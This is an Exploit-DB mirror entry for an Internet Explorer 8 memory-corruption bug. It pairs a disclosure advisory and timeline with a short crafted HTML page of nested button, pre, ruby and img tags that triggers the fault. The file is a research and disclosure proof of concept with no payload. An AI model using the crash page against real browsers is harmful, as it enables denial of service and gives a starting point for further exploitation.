exploit-db-mirror/exploits/windows/dos/40815.html
Offensive Security 36c084c351 DB: 2021-09-03
2021-09-03 13:39:06 +00:00

<!--
Source: http://blog.skylined.nl/20161121001.html
Synopsis
A specially crafted web-page can cause an unknown type of memory corruption in Microsoft Internet Explorer 8. This vulnerability can cause the Ptls5::LsFindSpanVisualBoundaries method (or other methods called by it) to access arbitrary memory.
Known affected software, attack vectors and mitigations
Microsoft Internet Explorer 8
An attacker would need to get a target user to open a specially crafted web-page. JavaScript is not necessarily required to trigger the issue.
Description
The memory corruption causes the Ptls5::LsFindSpanVisualBoundaries method to access data at seemingly random addresses. However, these addresses appear to always be in the same range as valid heap addresses, even if they are often not DWORD aligned. The reason for the memory corruption is not immediately obvious.
Repro.html
-->
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<button>
<pre>
<x>
<sub>
<ruby>
<img height="1"/>
</ruby>
</sub>
</x>
</pre>
</button>
</body>
</html>
<!--
Time-line
July 2014: This vulnerability was found through fuzzing.
November 2016: Details of this issue are released.
-->